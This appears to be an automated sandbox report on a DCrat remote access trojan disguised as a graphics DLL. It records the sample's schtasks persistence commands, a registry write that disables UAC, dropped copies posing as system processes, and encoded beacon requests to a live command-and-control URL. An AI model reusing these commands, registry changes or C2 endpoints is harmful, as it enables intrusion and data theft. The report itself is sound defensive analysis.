File name: | 426c1596904a3573a97ddc6160a3d4ee.exe |
Full analysis: | https://app.any.run/tasks/6cf85c07-d4f9-4620-992e-3853abcef057 |
Verdict: | Malicious activity |
Threats: | DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common. |
Analysis date: | August 12, 2022, 18:11:43 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
MD5: | 426C1596904A3573A97DDC6160A3D4EE |
SHA1: | EC3306F2E5F30EB9624CA70567B8530E8D9CEEC5 |
SHA256: | C8EC1D81681F09CF6E7BEA58A602DBF454805BB86A7229474C40C95557800B1A |
SSDEEP: | 49152:xGaMScp6xTNhaak09rIs6HoE2bC+iDolssqgdstn:xZMScp69WZHoEIziD4sqden |
.exe | | | Generic CIL Executable (.NET, Mono, etc.) (45.1) |
---|---|---|
.exe | | | Win32 Executable MS Visual C++ (generic) (19.2) |
.exe | | | Win64 Executable (generic) (17) |
.scr | | | Windows screen saver (8) |
.dll | | | Win32 Dynamic Link Library (generic) (4) |
ProductVersion: | 5.15.2.0 |
---|---|
ProductName: | libGLESv2 |
OriginalFileName: | libGLESv2.dll |
FileVersion: | 5.15.2.0 |
CharacterSet: | Unicode |
LanguageCode: | English (U.S.) |
FileSubtype: | - |
ObjectFileType: | Dynamic link library |
FileOS: | Win32 |
FileFlags: | (none) |
FileFlagsMask: | 0x003f |
ProductVersionNumber: | 5.15.2.0 |
FileVersionNumber: | 5.15.2.0 |
Subsystem: | Windows GUI |
SubsystemVersion: | 4 |
ImageVersion: | - |
OSVersion: | 4 |
EntryPoint: | 0x28afee |
UninitializedDataSize: | - |
InitializedDataSize: | 13824 |
CodeSize: | 2658304 |
LinkerVersion: | 6 |
PEType: | PE32 |
TimeStamp: | 2022:05:04 18:03:35+02:00 |
MachineType: | Intel 386 or later, and compatibles |
Architecture: | IMAGE_FILE_MACHINE_I386 |
---|---|
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 04-May-2022 16:03:35 |
Detected languages: |
|
FileVersion: | 5.15.2.0 |
OriginalFilename: | libGLESv2.dll |
ProductName: | libGLESv2 |
ProductVersion: | 5.15.2.0 |
Magic number: | MZ |
---|---|
Bytes on last page of file: | 0x0090 |
Pages in file: | 0x0003 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x0000 |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x0000 |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x00000080 |
Signature: | PE |
---|---|
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 4 |
Time date stamp: | 04-May-2022 16:03:35 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: |
|
Name | Virtual Address | Virtual Size | Raw Size | Charateristics | Entropy |
---|---|---|---|---|---|
.text | 0x00002000 | 0x00288FF4 | 0x00289000 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 7.67673 |
.sdata | 0x0028C000 | 0x00002FDF | 0x00003000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 3.24212 |
.rsrc | 0x00290000 | 0x00000218 | 0x00000400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 1.82822 |
.reloc | 0x00292000 | 0x0000000C | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 0.10191 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 3.27357 | 448 | UNKNOWN | English - United States | RT_VERSION |
mscoree.dll |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2908 | "C:\Users\admin\AppData\Local\Temp\426c1596904a3573a97ddc6160a3d4ee.exe" | C:\Users\admin\AppData\Local\Temp\426c1596904a3573a97ddc6160a3d4ee.exe | Explorer.EXE | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Version: 5.15.2.0 Modules
| |||||||||||||||
2072 | schtasks.exe /create /tn "SearchProtocolHostS" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Recorded TV\Sample Media\SearchProtocolHost.exe'" /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
2256 | schtasks.exe /create /tn "SearchProtocolHost" /sc ONLOGON /tr "'C:\Users\Public\Recorded TV\Sample Media\SearchProtocolHost.exe'" /rl HIGHEST /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3108 | schtasks.exe /create /tn "SearchProtocolHostS" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Recorded TV\Sample Media\SearchProtocolHost.exe'" /rl HIGHEST /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
4084 | schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\csrss.exe'" /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
272 | schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\MSOCache\All Users\csrss.exe'" /rl HIGHEST /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
2436 | schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\csrss.exe'" /rl HIGHEST /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3480 | schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 11 /tr "'C:\Users\admin\Documents\My Videos\taskhost.exe'" /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
1372 | schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Users\admin\Documents\My Videos\taskhost.exe'" /rl HIGHEST /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
2672 | schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 6 /tr "'C:\Users\admin\Documents\My Videos\taskhost.exe'" /rl HIGHEST /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
|
(PID) Process: | (2908) 426c1596904a3573a97ddc6160a3d4ee.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System |
Operation: | write | Name: | EnableLUA |
Value: 0 | |||
(PID) Process: | (2908) 426c1596904a3573a97ddc6160a3d4ee.exe | Key: | HKEY_CURRENT_USER\Software\1d638093609d7a065edfcf4e5efcf67a0991208d |
Operation: | write | Name: | 05cb3a0ee021dacc97c23f62d827e2d631995c9f |
Value: WyJDOlxcVXNlcnNcXGFkbWluXFxBcHBEYXRhXFxMb2NhbFxcVGVtcFxcNDI2YzE1OTY5MDRhMzU3M2E5N2RkYzYxNjBhM2Q0ZWUuZXhlIiwiQzpcXFVzZXJzXFxQdWJsaWNcXFJlY29yZGVkIFRWXFxTYW1wbGUgTWVkaWFcXFNlYXJjaFByb3RvY29sSG9zdC5leGUiLCJDOlxcTVNPQ2FjaGVcXEFsbCBVc2Vyc1xcY3Nyc3MuZXhlIiwiQzpcXFVzZXJzXFxhZG1pblxcRG9jdW1lbnRzXFxNeSBWaWRlb3NcXHRhc2tob3N0LmV4ZSIsIkM6XFxNU09DYWNoZVxcQWxsIFVzZXJzXFx7OTAxNDAwMDAtMDAxQS0wNDEyLTAwMDAtMDAwMDAwMEZGMUNFfS1DXFx3aW5sb2dvbi5leGUiLCJDOlxcTVNPQ2FjaGVcXEFsbCBVc2Vyc1xcezkwMTQwMDAwLTAwMUItMDQxMi0wMDAwLTAwMDAwMDBGRjFDRX0tQ1xcU2VhcmNoSW5kZXhlci5leGUiLCJDOlxcTVNPQ2FjaGVcXEFsbCBVc2Vyc1xcdGFza2VuZy5leGUiLCJDOlxcTVNPQ2FjaGVcXEFsbCBVc2Vyc1xcezkwMTQwMDAwLTAwQTEtMDQxOS0wMDAwLTAwMDAwMDBGRjFDRX0tQ1xcU2VhcmNoRmlsdGVySG9zdC5leGUiXQ== | |||
(PID) Process: | (2908) 426c1596904a3573a97ddc6160a3d4ee.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (2908) 426c1596904a3573a97ddc6160a3d4ee.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (2908) 426c1596904a3573a97ddc6160a3d4ee.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (2908) 426c1596904a3573a97ddc6160a3d4ee.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (2456) taskhost.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System |
Operation: | write | Name: | EnableLUA |
Value: 0 | |||
(PID) Process: | (2456) taskhost.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\taskhost_RASAPI32 |
Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
(PID) Process: | (2456) taskhost.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\taskhost_RASAPI32 |
Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
(PID) Process: | (2456) taskhost.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\taskhost_RASAPI32 |
Operation: | write | Name: | FileTracingMask |
Value: |
PID | Process | Filename | Type | |
---|---|---|---|---|
2908 | 426c1596904a3573a97ddc6160a3d4ee.exe | C:\Users\admin\AppData\Local\Temp\kcvBAhpiNn | text | |
MD5:868089A30C3C068F4CD66D74E645A420 | SHA256:638A5AFB7FEFA086B2503A49A2A2A3486CDF9FFF440B4A474603A379E61A8826 | |||
2908 | 426c1596904a3573a97ddc6160a3d4ee.exe | C:\MSOCache\All Users\taskeng.exe | executable | |
MD5:426C1596904A3573A97DDC6160A3D4EE | SHA256:C8EC1D81681F09CF6E7BEA58A602DBF454805BB86A7229474C40C95557800B1A | |||
2908 | 426c1596904a3573a97ddc6160a3d4ee.exe | C:\MSOCache\All Users\{90140000-001B-0412-0000-0000000FF1CE}-C\SearchIndexer.exe | executable | |
MD5:426C1596904A3573A97DDC6160A3D4EE | SHA256:C8EC1D81681F09CF6E7BEA58A602DBF454805BB86A7229474C40C95557800B1A | |||
2908 | 426c1596904a3573a97ddc6160a3d4ee.exe | C:\Users\Public\Recorded TV\Sample Media\SearchProtocolHost.exe | executable | |
MD5:426C1596904A3573A97DDC6160A3D4EE | SHA256:C8EC1D81681F09CF6E7BEA58A602DBF454805BB86A7229474C40C95557800B1A | |||
2908 | 426c1596904a3573a97ddc6160a3d4ee.exe | C:\MSOCache\All Users\csrss.exe | executable | |
MD5:426C1596904A3573A97DDC6160A3D4EE | SHA256:C8EC1D81681F09CF6E7BEA58A602DBF454805BB86A7229474C40C95557800B1A | |||
2908 | 426c1596904a3573a97ddc6160a3d4ee.exe | C:\MSOCache\All Users\{90140000-001A-0412-0000-0000000FF1CE}-C\winlogon.exe | executable | |
MD5:426C1596904A3573A97DDC6160A3D4EE | SHA256:C8EC1D81681F09CF6E7BEA58A602DBF454805BB86A7229474C40C95557800B1A | |||
2908 | 426c1596904a3573a97ddc6160a3d4ee.exe | C:\MSOCache\All Users\{90140000-00A1-0419-0000-0000000FF1CE}-C\SearchFilterHost.exe | executable | |
MD5:426C1596904A3573A97DDC6160A3D4EE | SHA256:C8EC1D81681F09CF6E7BEA58A602DBF454805BB86A7229474C40C95557800B1A | |||
2908 | 426c1596904a3573a97ddc6160a3d4ee.exe | C:\Users\admin\Videos\taskhost.exe | executable | |
MD5:426C1596904A3573A97DDC6160A3D4EE | SHA256:C8EC1D81681F09CF6E7BEA58A602DBF454805BB86A7229474C40C95557800B1A | |||
2456 | taskhost.exe | C:\Users\admin\AppData\Local\Temp\FVipfPOr3J | text | |
MD5:46E5F9AFC53730D4231644DC5BA68722 | SHA256:6882F3AD37855F1656D613139B8214446638CB498D01866936487253D9966FA4 | |||
2908 | 426c1596904a3573a97ddc6160a3d4ee.exe | C:\MSOCache\All Users\{90140000-00A1-0419-0000-0000000FF1CE}-C\617403385cfa57 | text | |
MD5:DEEFE3A95DD6363F22B08E5039053ED0 | SHA256:210D3C5FB0D7ED0CC9DD288CA827C073D2FD9A0EF0A6895F24B2EF53A60A8D89 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2456 | taskhost.exe | GET | 200 | 141.8.192.82:80 | http://a0703775.xsph.ru/_Defaultwindows.php?J0b7w1U=kjeOu11QiD6TJENsq78v8bq&c82e276f9453e631934d7a9a9fb6e8fd=QZzQDMmBjZwMDZhNDMjFGN0UmN4QzMhRmMxMjN5QTZyAzYhljNxUDZ5EDMykzMwgDOzgzM2ADN&52e56fa0fd9909e706f64115c778c92e=gMwMWZ0kDMmJWNiRTO4U2N2MDMwAjYyEzYkNGNhZjZxgDOiJDOyAjY&17f66129747d8bcfad4426ccdcc9bf80=0VfiIiOiEWZ5YGN2UGNzETOzUTY0ImZ0EmZ0gzMkdjYmBzN2czMiwiI5YmZiVDM4EWNwQTYiVWN4UGMjBjZjNDNmJjYlZTOhVzM1YWO2YTOmJiOiMzN1YDOwQDN1MmY5UjYyYjYhBzMkRGNkBzMmN2MjVDOiwiIxY2Y0QzYjJGOjZGZkFWNjNDZ5ITYyQWMjJDZlJzN4MTYhVjZlRmZkJiOiQmNkVzYxMWMhNDOxQGM1MjZzYTMxEzYkZDN3ADZlVTZis3W | RU | — | — | malicious |
2456 | taskhost.exe | GET | — | 141.8.192.82:80 | http://a0703775.xsph.ru/_Defaultwindows.php?J0b7w1U=kjeOu11QiD6TJENsq78v8bq&c82e276f9453e631934d7a9a9fb6e8fd=QZzQDMmBjZwMDZhNDMjFGN0UmN4QzMhRmMxMjN5QTZyAzYhljNxUDZ5EDMykzMwgDOzgzM2ADN&52e56fa0fd9909e706f64115c778c92e=gMwMWZ0kDMmJWNiRTO4U2N2MDMwAjYyEzYkNGNhZjZxgDOiJDOyAjY&1062bb854f89fb8f9d4a26ad510d529a=d1nI1ITMiNDM4ITOkRDMklTYxIDN4MTZmBzMmNzYkdDZ3cjZkBTN0AzYzIiOiMzN1YDOwQDN1MmY5UjYyYjYhBzMkRGNkBzMmN2MjVDOiwiIxY2Y0QzYjJGOjZGZkFWNjNDZ5ITYyQWMjJDZlJzN4MTYhVjZlRmZkJiOiQmNkVzYxMWMhNDOxQGM1MjZzYTMxEzYkZDN3ADZlVTZis3W&17f66129747d8bcfad4426ccdcc9bf80=d1nIiojIhVWOmRjNlRzMxkzM1EGNiZGNhZGN4MDZ3ImZwcjN3MjIsISNyEjYzADOykDZ0ADZ5EWMyQDOzUmZwMjZzMGZ3Q2N3YGZwUDNwM2MiojIzcTN2gDM0QTNjJWO1ImM2IWYwMDZkRDZwMjZjNzY1gjIsISMmNGN0M2YihzYmRGZhVzYzQWOyEmMkFzYyQWZycDOzEWY1YWZkZGZiojIkZDZ1MWMjFTYzgTMkBTNzY2M2ETMxMGZ2QzNwQWZ1UmI7xSfiADWmlWTYJ2ZjRlTp9maJRzZU5Uaa1WTw0kaZpmVX10MJJTT5F1RaJTRyk1aGpmTsJlMOxmUtpVaO1mTsJkeO1mUql1aKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzl0UaJDbHRmaGtWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpFlbjhmUzUVavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWeNd2YtJGcCh0YsJ1MVdWUU90Z3dlWrlzVUdWWElUN4dVY0ZUbSdWUq5ENoNUS2gGMSd3YqxUeBNUUnVlRVRkQD10dRpmT0VFVhd2aTRVVoNlW5ljMRd2apV1b3dlWwUzVTl2bqlEbxcVWPZlRVRkSDxUarNVU2RTRLdWSYpFMChVWrZURJpnTXF2bChVW5RWRJJEZrZ1ZR12YoJVbihmUzUVavpWSsFzVZ9kVGVFSKNETpRzaJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnlkeNd2dXlVd5cVY65EWa1WOtNWUClnTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJBHdtJGcOhkYshGMMxmQzIWeWhlUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXSDpVdGdkY1xWbSdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplkaNBzaqxEMJRET0sGVNVXQq5UavpWSqlzRil2dplkSatWS2k0UllnUuJWM5ITWpdXaJhmRXJGcOhFZWpUaPlGNyIGckdlW5p0QMl2ayEWdsJzYzZ1RTl2bqlUNShVYqp0QMlWWqxUerRVT1FFROlHNp5UNFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiEWZ5YGN2UGNzETOzUTY0ImZ0EmZ0gzMkdjYmBzN2czMiwiIxYDZkR2NlZTY4UmNjFjN1IGZwE2MxYGM1cjMlJWM5MjNkVWYhlTYmJiOiMzN1YDOwQDN1MmY5UjYyYjYhBzMkRGNkBzMmN2MjVDOiwiIxY2Y0QzYjJGOjZGZkFWNjNDZ5ITYyQWMjJDZlJzN4MTYhVjZlRmZkJiOiQmNkVzYxMWMhNDOxQGM1MjZzYTMxEzYkZDN3ADZlVTZis3W | RU | — | — | malicious |
2456 | taskhost.exe | GET | — | 141.8.192.82:80 | http://a0703775.xsph.ru/_Defaultwindows.php?J0b7w1U=kjeOu11QiD6TJENsq78v8bq&c82e276f9453e631934d7a9a9fb6e8fd=QZzQDMmBjZwMDZhNDMjFGN0UmN4QzMhRmMxMjN5QTZyAzYhljNxUDZ5EDMykzMwgDOzgzM2ADN&52e56fa0fd9909e706f64115c778c92e=gMwMWZ0kDMmJWNiRTO4U2N2MDMwAjYyEzYkNGNhZjZxgDOiJDOyAjY&17f66129747d8bcfad4426ccdcc9bf80=QX9JSUNJiOiEWZ5YGN2UGNzETOzUTY0ImZ0EmZ0gzMkdjYmBzN2czMiwiI5UjMwQ2M5EjNlZTYhlTYkNTYiZmZlhjY1czYiFTO2ETOhVWZiJjM4IiOiMzN1YDOwQDN1MmY5UjYyYjYhBzMkRGNkBzMmN2MjVDOiwiIxY2Y0QzYjJGOjZGZkFWNjNDZ5ITYyQWMjJDZlJzN4MTYhVjZlRmZkJiOiQmNkVzYxMWMhNDOxQGM1MjZzYTMxEzYkZDN3ADZlVTZis3W | RU | — | — | malicious |
2456 | taskhost.exe | GET | 200 | 141.8.192.82:80 | http://a0703775.xsph.ru/_Defaultwindows.php?J0b7w1U=kjeOu11QiD6TJENsq78v8bq&c82e276f9453e631934d7a9a9fb6e8fd=QZzQDMmBjZwMDZhNDMjFGN0UmN4QzMhRmMxMjN5QTZyAzYhljNxUDZ5EDMykzMwgDOzgzM2ADN&52e56fa0fd9909e706f64115c778c92e=gMwMWZ0kDMmJWNiRTO4U2N2MDMwAjYyEzYkNGNhZjZxgDOiJDOyAjY&1062bb854f89fb8f9d4a26ad510d529a=d1nI1ITMiNDM4ITOkRDMklTYxIDN4MTZmBzMmNzYkdDZ3cjZkBTN0AzYzIiOiMzN1YDOwQDN1MmY5UjYyYjYhBzMkRGNkBzMmN2MjVDOiwiIxY2Y0QzYjJGOjZGZkFWNjNDZ5ITYyQWMjJDZlJzN4MTYhVjZlRmZkJiOiQmNkVzYxMWMhNDOxQGM1MjZzYTMxEzYkZDN3ADZlVTZis3W&17f66129747d8bcfad4426ccdcc9bf80=d1nIiojIhVWOmRjNlRzMxkzM1EGNiZGNhZGN4MDZ3ImZwcjN3MjIsISNyEjYzADOykDZ0ADZ5EWMyQDOzUmZwMjZzMGZ3Q2N3YGZwUDNwM2MiojIzcTN2gDM0QTNjJWO1ImM2IWYwMDZkRDZwMjZjNzY1gjIsISMmNGN0M2YihzYmRGZhVzYzQWOyEmMkFzYyQWZycDOzEWY1YWZkZGZiojIkZDZ1MWMjFTYzgTMkBTNzY2M2ETMxMGZ2QzNwQWZ1UmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzl0UaJDbHRmaGtWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpFlbjhmUzUVavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWeNd2YtJGcCh0YsJ1MVdWUU90Z3dlWrlzVUdWWElUN4dVY0ZUbSdWUq5ENoNUS2gGMSd3YqxUeBNUUnVlRVRkQD10dRpmT0VFVhd2aTRVVoNlW5ljMRd2apV1b3dlWwUzVTl2bqlEbxcVWPZlRVRkSDxUarNVU2RTRLdWSYpFMChVWrZURJpnTXF2bChVW5RWRJJEZrZ1ZR12YoJVbihmUzUVavpWSsFzVZ9kVGVFSKNETpRzaJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnlkeNd2dXlVd5cVY65EWa1WOtNWUClnTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJBHdtJGcOhkYshGMMxmQzIWeWhlUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXSDpVdGdkY1xWbSdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplkaNBzaqxEMJRET0sGVNVXQq5UavpWSqlzRil2dplkSatWS2k0UllnUuJWM5ITWpdXaJhmRXJGcOhFZWpUaPlGNyIGckdlW5p0QMl2ayEWdsJzYzZ1RTl2bqlUNShVYqp0QMlWWqxUerRVT1FFROlHNp5UNFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiEWZ5YGN2UGNzETOzUTY0ImZ0EmZ0gzMkdjYmBzN2czMiwiIxYDZkR2NlZTY4UmNjFjN1IGZwE2MxYGM1cjMlJWM5MjNkVWYhlTYmJiOiMzN1YDOwQDN1MmY5UjYyYjYhBzMkRGNkBzMmN2MjVDOiwiIxY2Y0QzYjJGOjZGZkFWNjNDZ5ITYyQWMjJDZlJzN4MTYhVjZlRmZkJiOiQmNkVzYxMWMhNDOxQGM1MjZzYTMxEzYkZDN3ADZlVTZis3W | RU | text | 104 b | malicious |
2456 | taskhost.exe | GET | — | 141.8.192.82:80 | http://a0703775.xsph.ru/_Defaultwindows.php?J0b7w1U=kjeOu11QiD6TJENsq78v8bq&c82e276f9453e631934d7a9a9fb6e8fd=QZzQDMmBjZwMDZhNDMjFGN0UmN4QzMhRmMxMjN5QTZyAzYhljNxUDZ5EDMykzMwgDOzgzM2ADN&52e56fa0fd9909e706f64115c778c92e=gMwMWZ0kDMmJWNiRTO4U2N2MDMwAjYyEzYkNGNhZjZxgDOiJDOyAjY&1062bb854f89fb8f9d4a26ad510d529a=d1nI1ITMiNDM4ITOkRDMklTYxIDN4MTZmBzMmNzYkdDZ3cjZkBTN0AzYzIiOiMzN1YDOwQDN1MmY5UjYyYjYhBzMkRGNkBzMmN2MjVDOiwiIxY2Y0QzYjJGOjZGZkFWNjNDZ5ITYyQWMjJDZlJzN4MTYhVjZlRmZkJiOiQmNkVzYxMWMhNDOxQGM1MjZzYTMxEzYkZDN3ADZlVTZis3W&17f66129747d8bcfad4426ccdcc9bf80=d1nIiojIhVWOmRjNlRzMxkzM1EGNiZGNhZGN4MDZ3ImZwcjN3MjIsISNyEjYzADOykDZ0ADZ5EWMyQDOzUmZwMjZzMGZ3Q2N3YGZwUDNwM2MiojIzcTN2gDM0QTNjJWO1ImM2IWYwMDZkRDZwMjZjNzY1gjIsISMmNGN0M2YihzYmRGZhVzYzQWOyEmMkFzYyQWZycDOzEWY1YWZkZGZiojIkZDZ1MWMjFTYzgTMkBTNzY2M2ETMxMGZ2QzNwQWZ1UmI7xSfiADWmlWTYJ2ZjRlTp9maJRzZU5Uaa1WTw0kaZpmVX10MJJTT5F1RaJTRyk1aGpmTsJlMOxmUtpVaO1mTsJkeO1mUql1aKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzl0UaJDbHRmaGtWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpFlbjhmUzUVavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWeNd2YtJGcCh0YsJ1MVdWUU90Z3dlWrlzVUdWWElUN4dVY0ZUbSdWUq5ENoNUS2gGMSd3YqxUeBNUUnVlRVRkQD10dRpmT0VFVhd2aTRVVoNlW5ljMRd2apV1b3dlWwUzVTl2bqlEbxcVWPZlRVRkSDxUarNVU2RTRLdWSYpFMChVWrZURJpnTXF2bChVW5RWRJJEZrZ1ZR12YoJVbihmUzUVavpWSsFzVZ9kVGVFSKNETpRzaJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnlkeNd2dXlVd5cVY65EWa1WOtNWUClnTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJBHdtJGcOhkYshGMMxmQzIWeWhlUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXSDpVdGdkY1xWbSdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplkaNBzaqxEMJRET0sGVNVXQq5UavpWSqlzRil2dplkSatWS2k0UllnUuJWM5ITWpdXaJhmRXJGcOhFZWpUaPlGNyIGckdlW5p0QMl2ayEWdsJzYzZ1RTl2bqlUNShVYqp0QMlWWqxUerRVT1FFROlHNp5UNFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiEWZ5YGN2UGNzETOzUTY0ImZ0EmZ0gzMkdjYmBzN2czMiwiIxYDZkR2NlZTY4UmNjFjN1IGZwE2MxYGM1cjMlJWM5MjNkVWYhlTYmJiOiMzN1YDOwQDN1MmY5UjYyYjYhBzMkRGNkBzMmN2MjVDOiwiIxY2Y0QzYjJGOjZGZkFWNjNDZ5ITYyQWMjJDZlJzN4MTYhVjZlRmZkJiOiQmNkVzYxMWMhNDOxQGM1MjZzYT